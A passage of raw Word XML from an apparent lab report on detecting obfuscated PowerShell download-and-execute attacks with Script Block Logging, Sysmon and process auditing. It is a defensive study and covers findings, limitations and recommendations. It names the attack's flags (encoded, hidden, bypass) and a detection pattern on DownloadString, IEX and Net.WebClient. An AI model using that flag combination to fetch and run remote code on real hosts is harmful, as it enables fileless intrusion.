              <w:t xml:space="preserve">e.g. winword.exe → powershell.exe would indicate a phishing macro chain (not observed in this manual test run)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Detection Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">All three log sources fired within the same second the test command was executed, and the corresponding events were locatable in Event Viewer using targeted search terms (DownloadString for the 4104 event) rather than manual scrolling — confirming that, once enabled, this logging configuration supports near-real-time detection rather than only after-the-fact forensic review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Correlation Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Read together rather than in isolation, the three log sources tell a single, coherent story. Sysmon Event ID 1 establishes that a powershell.exe process was created at a specific timestamp, with a specific parent process, a specific SHA256 hash, and a specific (still-encoded) command line — this is the who, what, and when. Event ID 4104 then supplies the why: the actual, decoded intent of that process, which the raw command line alone could not reveal. Event ID 4688, although not captured as a figure in this run, would corroborate the raw command line seen in Sysmon from an entirely independent Windows subsystem (the Security auditing pipeline rather than the PowerShell engine or Sysmon's kernel driver), which matters operationally: an attacker capable of tampering with or disabling one logging mechanism would still likely be caught by the others, since they are implemented independently of one another.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 False Positive Considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Not every event containing these indicators is malicious, and this matters for how the findings would be operationalised. -WindowStyle Hidden and -ExecutionPolicy Bypass are both used routinely by legitimate scheduled tasks, deployment tools, and administrative scripts, particularly in automated contexts where no user is present to see a console window in the first place. -EncodedCommand is likewise commonly used by legitimate remote-management tooling to safely pass complex commands containing special characters. The strength of this project's simulated attack as a detection target came not from any single flag but from the specific combination of all three flags together with a script body that performed a remote download-and-execute — a combination that is far less common in benign administrative activity than any single indicator viewed alone. Any production detection rule built from these findings should therefore score the combination, not alert on any one flag in isolation, to keep the false-positive rate manageable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Script Block Logging (Event 4104) fully decoded a Base64-obfuscated, hidden-window PowerShell command, recovering the true IEX / Net.WebClient / DownloadString intent without any manual decoding step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon Event ID 1 independently corroborated the same process launch and added process lineage, integrity level, and a SHA256 hash unavailable from native Windows logging alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Command-line process auditing (Event 4688) was verified as correctly configured, providing a third, independently-implemented data source for the raw command line as defence-in-depth against any single logging mechanism being tampered with or disabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">All detection was achieved using only free, built-in Windows capabilities and a freely available community Sysmon configuration, with no commercial EDR or SIEM product involved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The evidence collected was sufficient to reconstruct a complete, defensible incident narrative — what ran, what it actually intended to do, and what process launched it — which is the standard a SOC analyst would need to escalate or close a real alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Analysis and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 What the Results Demonstrate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The central finding is that Script Block Logging alone closes most of the visibility gap that obfuscation is designed to exploit. Because PowerShell logs script content only after its own engine has decoded it, the specific obfuscation technique used at launch — Base64, string concatenation, character-code manipulation — becomes largely irrelevant to detection once this control is enabled. This is a materially stronger defence than command-line-only auditing (Event ID 4688), which would have shown only the still-encoded string and required the analyst to manually decode it before understanding intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon's contribution was complementary rather than redundant: it supplied process lineage, integrity level, and a cryptographic hash of the executing binary, none of which native Windows Script Block Logging records. In a triage scenario, the hash enables a quick reputation lookup (for example against VirusTotal) even when the command-line content is not immediately conclusive, and the parent-child relationship is often the fastest way to separate malicious activity from routine administration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Three limitations should be acknowledged. First, the attack simulation was launched manually from an already-open PowerShell session, so the recorded parent process was itself powershell.exe rather than a more suspicious parent such as a Microsoft Office application or a script host — a real phishing-delivered attack would very likely show a more anomalous process chain, and this report's evidence should be read with that caveat rather than as proof that parent-process analysis is unnecessary. Second, no SIEM or centralised log forwarding was used; on a fleet of more than a handful of endpoints, reviewing Event Viewer manually on each host individually does not scale, and a Windows Event Forwarding (WEF) or Sysmon-to-SIEM pipeline would be required in production. Third, Script Block Logging is verbose: even this single-host, single-test lab generated a large number of routine 4104 and 4103 events (background pipeline calls such as the prompt function), and precise search terms were required to isolate the relevant one — on a busy production endpoint this volume problem would be considerably worse without further tuning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy this same logging baseline (Script Block Logging, Module Logging, command-line auditing, Sysmon with a maintained configuration) fleet-wide via domain Group Policy rather than per-machine, so coverage does not depend on individual endpoint configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward PowerShell Operational and Sysmon Operational logs to a central SIEM (Splunk, Wazuh, or the ELK stack) using Windows Event Forwarding or a lightweight log shipper, and encode the detection logic demonstrated manually in this report as a Sigma rule (e.g. 4104 events containing DownloadString, IEX, or Net.WebClient, combined with -EncodedCommand in the launching command line) so that alerts fire automatically rather than requiring manual review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply PowerShell Constrained Language Mode and/or Just Enough Administration (JEA) on endpoints that do not require full scripting capability, reducing the blast radius available to an attacker even if execution is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Periodically review and tune the Sysmon configuration (e.g. the SwiftOnSecurity template) against the organisation's own baseline of legitimate administrative scripts, to reduce alert fatigue without losing coverage of the indicators demonstrated in this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Extend detection coverage to network telemetry (e.g. firewall or proxy logs for outbound connections matching the DownloadString/WebClient pattern) so that fileless attacks are visible even in the rare case a host-based control is disabled or tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Microsoft Defender Attack Surface Reduction (ASR) rules that specifically target obfuscated script execution and process injection from Office applications, as a complementary preventive control alongside the detective controls demonstrated in this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Comparison to Industry Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration built in this project mirrors, at a smaller scale, what published incident-response case studies and vendor threat reports consistently describe as baseline PowerShell visibility in mature SOCs: Script Block Logging and Sysmon (or an equivalent commercial EDR agent providing similar telemetry) are treated as close to mandatory rather than optional hardening in current guidance from Microsoft, CIS, and MITRE alike. Where this lab differs from a mature production deployment is primarily in scale and automation — centralised SIEM correlation via Sigma rules, fleet-wide policy enforcement, and 24/7 alerting — rather than in the underlying detection logic itself, which this project shows can be fully validated on a single host with no paid tooling at all.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.5 Mapping to MITRE ATT&amp;CK Data Sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2 maps the log sources used in this project to the ATT&amp;CK data components most commonly cited for detecting T1059.001, confirming that the lab's chosen controls align with the framework referenced in Section 2.1 rather than being an ad hoc selection.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3030"/>
        <w:gridCol w:w="3030"/>
      </w:tblGrid>
      <w:tr>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ATT&amp;CK Data Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="303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Log Source in This Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="303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Result Obtained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Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3030"/>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4104 (Script Block Logging)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3030"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Decoded script content recovered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Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3030"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon Event 1 / Event 4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3030"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Raw command line, lineage, hash recovered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Module/Script Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3030"/>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4103 (Module Logging)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3030"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pipeline invocation details recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2 — Log sources used in this project mapped to MITRE ATT&amp;CK T1059.001 data components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.6 Cost and Effort Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Every tool used in this project — Windows' built-in Group Policy Editor, Sysmon, and the SwiftOnSecurity configuration — is free, and the total configuration time from a clean Windows 10 install to a fully working detection pipeline was under an hour. This is a meaningful finding in its own right for an organisation weighing security investment: the marginal cost of the baseline visibility demonstrated here is close to zero, and the primary barrier to adoption in practice is awareness and process (someone deciding to enable these settings and periodically review the resulting logs) rather than budget. The recommendations in Section 6.3 that require genuine investment — a SIEM platform, dedicated analyst time for Sigma rule tuning — are precisely the ones needed to scale this from a single validated host to an organisation-wide control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.7 Threats to Validity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">As with any single-scenario lab, the findings here should be generalised carefully. The project tested one command pattern on one unmanaged host with a local administrator account; results may differ on a domain-joined endpoint with Constrained Language Mode, application allow-listing, or a different PowerShell version already in place, any of which could change what an attacker is able to execute or how it is logged. The manual detection workflow described in Sections 4.5 and 5 also benefited from knowing in advance what to search for, which is a materially easier task than genuine unknown-threat hunting; a production deployment's real test is whether its Sigma rules and analysts can surface this same pattern without that foreknowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell's power and ubiquity make it an attractive Living-off-the-Land tool for attackers, and its abuse is largely invisible to traditional file-based antivirus. This project demonstrated, in a small and fully reproducible lab, that a defender does not need a commercial EDR product to regain visibility: enabling Script Block Logging, Module Logging, command-line process auditing, and Sysmon on a single Windows 10 host was sufficient to fully decode and detect a representative obfuscated, fileless attack command, and to recover the executing process's lineage and hash for further triage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The exercise also surfaced practical limitations that matter for a real deployment — log volume, the need for centralised correlation at scale, and the fact that process lineage alone is not conclusive without the surrounding command-line context. Addressing those through the recommendations above — centralised forwarding, Sigma-based automated correlation, and fleet-wide policy deployment — would translate this single-host proof of concept into a workable production SOC control. The broader lesson is that meaningful PowerShell visibility is primarily a configuration and process exercise built on tooling most Windows environments already own, rather than a problem that can only be solved by purchasing additional security products.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">From a Blue Team skills perspective, this project reinforced that detection engineering is as much about knowing where evidence lives and how to correlate it as it is about deploying any particular product. The same three log sources examined here — Script Block Logging, Sysmon, and process-creation auditing — recur across the vast majority of Windows-focused detection content published by MITRE, CIS, and the wider security community, which suggests that the skills exercised in this lab transfer directly to real SOC analyst work rather than being specific to this one simulated scenario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] MITRE ATT&amp;CK, "Command and Scripting Interpreter: PowerShell (T1059.001)," MITRE Corporation. [Online]. Available: https://attack.mitre.org/techniques/T1059/001/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] Microsoft, "about_Logging_Windows," PowerShell Documentation, Microsoft Learn. [Online]. Available: https://learn.microsoft.com/powershell/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] M. Russinovich and T. Garnier, "Sysmon - System Monitor," Microsoft Sysinternals. [Online]. Available: https://learn.microsoft.com/sysinternals/downloads/sysmon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] SwiftOnSecurity, "sysmon-config," GitHub repository. [Online]. Available: https://github.com/SwiftOnSecurity/sysmon-config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] LOLBAS Project, "Living Off The Land Binaries and Scripts." [Online]. Available: https://lolbas-project.github.io/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] Sigma HQ, "Sigma: Generic Signature Format for SIEM Systems," GitHub repository. [Online]. Available: https://github.com/SigmaHQ/sigma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] Center for Internet Security, "CIS Microsoft Windows 10 Benchmark." [Online]. Available: https://www.cisecurity.org/benchmark/microsoft_windows_desktop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
